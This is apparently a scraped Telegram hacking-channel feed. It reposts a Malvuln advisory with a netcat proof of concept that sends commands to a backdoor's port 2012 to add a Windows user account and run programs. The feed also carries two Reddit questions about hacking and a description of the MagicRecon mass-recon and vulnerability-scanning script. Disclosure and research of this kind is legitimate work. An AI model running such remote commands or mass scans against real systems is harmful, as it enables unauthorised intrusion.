Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.NetControl2.293 Code Execution

https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Backdoor.Win32.NetControl2.293 malware suffers from a code execution vulnerability.

MD5 | 9979d63a7651677939b99c80298affe2

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/15ca804e4634d9586f85b1d15ebe91a0.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NetControl2.293
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 2012. Attackers who can reach infected hosts can run arbitrary OS commands using the DOSCMD command made available by the backdoor.
Type: PE32
MD5: 15ca804e4634d9586f85b1d15ebe91a0
Vuln ID: MVID-2021-0231
Disclosure: 05/29/2021

Exploit/PoC:
nc64.exe x.x.x.x 2012

1) Add accounts
DOSCMD cmd /c net user malvuln "" /add

2) Run programs
DOSCMD cmd /c calc
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Modern trends and specific exploits as plot devices

Hello

I'm writing a thriller/detective story with strong focus on hacking. While I'm an IT professional, security is not my main focus and I must humbly accept that I don't know much about "hacking world in 2021".

I want to convey brilliance and expertise of the characters and also educate the readers on some of important concepts, so I need something more specific than "he hacked it using exploit in unpatched browser". But still rather high level not to bore or confuse.

Can you suggest any current good sources about general trends (e.g. Im fascinated by side channel attack) or specific cases? Thanks.

submitted by /u/Corrsarz
[link] [comments]
hacking: security in practice
When is a good time to give up?

I’ve just started hacking and I’m using a book from three years ago. There’s a chapter where we learn about Windows Exploits, and the program we use for it is called Responder. For the past four days (Fri-Monday) I’ve been trying to get this thing to work using any and all configurations and methods. It came to a point to where I really just wanted to give up on life in general. I tried everything. I looked through every github, and watched a YouTube video. Should I give up?

submitted by /u/Least_Protection_288
[link] [comments]
MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats. The new version of MagicRecon has a large number of new tools to automate as much as possible the process of collecting data from a target and searching for vulnerabilities. It also has a menu where the user can select which option he wants to execute. This new version also has the option of "Install dependencies" with which the user can easily install all the tools and dependencies that are needed to run MagicRecon. The script code has been made in a modular way so that any user can modify it to their liking. With MagicRecon you can easily find: Sensitive information disclosure. Missing HTTP headers. Open S3 buckets. Subdomain takeovers. SSL/TLS bugs. Open ports and services. Email spoofing. Endpoints. Directories. Juicy files. Javascript files with senstive info. CORS missconfigurations. Cross-site scripting (XSS). Open Redirect. SQL Injection. Server-side request forgery (SSRF). CRLF Injection. Remote Code Execution (RCE). Other bugs.
Disclaimer

The author of this document take no responsibility for correctness. This project is merely here to help guide security researchers towards determining whether something is vulnerable or not, but does not guarantee accuracy. Warning: This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.
Requirements
To run the project, you will need to install the following tools: Subfinder (https://github.com/projectdiscovery/subfinder) Httpx (https://github.com/projectdiscovery/httpx) Notify (https://github.com/projectdiscovery/notify) Nuclei (https://github.com/projectdiscovery/nuclei) Nuclei-templates (https://github.com/projectdiscovery/nuclei-templates) SecLists (https://github.com/danielmiessler/SecLists) Corsy (https://github.com/s0md3v/Corsy) Securityheaders (https://github.com/koenbuyens/securityheaders) Ssl-checker (https://github.com/narbehaj/ssl-checker) Secretfinder (https://github.com/m4ll0k/SecretFinder) Wfuzz (https://github.com/xmendez/wfuzz) Aquatone (https://github.com/michenriksen/aquatone) Html-tool (https://github.com/tomnomnom/hacks/tree/master/html-tool) Waybackurls (https://github.com/tomnomnom/waybackurls) Kxss (https://github.com/Emoe/kxss) Anew (https://github.com/tomnomnom/anew) Qsreplace (https://github.com/tomnomnom/qsreplace) Urlprobe (https://github.com/1ndianl33t/urlprobe) Anew (https://github.com/tomnomnom/anew) Gf (https://github.com/tomnomnom/gf) Gobuster (https://github.com/OJ/gobuster) Findomain (https://github.com/Findomain/Findomain) spoofcheck (https://github.com/BishopFox/spoofcheck) linkfiner (https://github.com/GerbenJavado/LinkFinder) Nmap (https://nmap.org/)
IMPORTANT: Remember to configure the Notify and Subfinder tools to work properly.

Usage
vulnerability analysis with notifications via Discord, Telegram or Slack 3) Subdomain enumeration 4) Subdomain enumeration and vulnerability scanning (https://www.kitploit.com/search/label/Vulnerability%20Scanning) with nuclei 5) Subdomain enumeration with common vulnerabilities (https://www.kitploit.com/search/label/Common%20Vulnerabilities) scanning 6) Scan for javascript files 7) Scan for files and directoires 8) All in one! (original MagicRecon) q) Exit Choose a option: ">./magicRecon.sh

Output:

__ __ _ ____
| \/ | __ _ __ _(_) ___| _ \ ___ ___ ___ _ __
| |\/| |/ _` |/ _` | |/ __| |_) / _ \/ __/ _ \| '_ \
| | | | (_| | (_| | | (__| _ < __/ (_| (_) | | | |
|_| |_|\__,_|\__, |_|\___|_| \_\___|\___\___/|_| |_|
|___/

MENU
1) Install dependencies
2) Massive vulnerability analysis with notifications via Discord, Telegram or Slack

___________________________
@hacking_Attack
@Hacking_Video